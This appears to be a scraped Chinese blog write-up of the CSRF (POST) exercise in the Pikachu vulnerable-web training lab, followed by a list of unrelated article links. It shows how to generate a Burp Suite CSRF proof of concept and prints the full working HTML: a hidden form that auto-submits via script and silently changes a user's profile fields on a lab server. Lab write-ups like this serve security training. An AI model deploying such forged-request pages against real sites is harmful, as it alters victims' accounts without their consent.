当前位置: 首页 > article >正文

Pikachu-csrf-CSRF(POST)

article 2024/10/10 18:51:43

发起请求

拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC 

得到以下 html 代码 ,生成poc.html 文件,当用户点击

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.3.224:8082/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="11" />
      <input type="hidden" name="phonenum" value="11" />
      <input type="hidden" name="add" value="11" />
      <input type="hidden" name="email" value="1234" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

打开 poc.html 页面,点击submit request ,即可达成攻击;


http://www.kler.cn/news/341598.html

相关文章:

  • 最短路径(ShortestPaths)
  • Java 运行机制及运行过程
  • Android SQLite 数据库 FTS 虚拟表简介
  • python3的语法
  • Java动态代理示例代码
  • 【PostgreSQL】提高篇——深入讨论约束(如 NOT NULL、CHECK、FOREIGN KEY)的使用及其对数据完整性的影响
  • C#-使用Serilog框架快速实现日志及其相关扩展
  • SpringBoot实现的美发门店客户关系管理(CRM)系统
  • 如何安装Llama3.1 —— 附一键安装包!
  • 【Linux探索学习】第三弹——Linux的基础指令(下)——开启新篇章的大门
  • Axios 网络请求
  • docker环境redis启动失败
  • Linux 6.11版本发布
  • 毕设 大数据抖音短视频数据分析与可视化(源码)
  • python 实现connected components连通分量算法
  • strstr
  • 【AD速成】半小时入门AltiumDesigner(速通基础)
  • 安装 Android Studio 步骤日志
  • python 进程和线程
  • RTX4060+ubuntu22.04+cuda11.8.0+cuDNN8.6.0 如何根据显卡型号和系统配置cuda和cuDNN所需的安装环境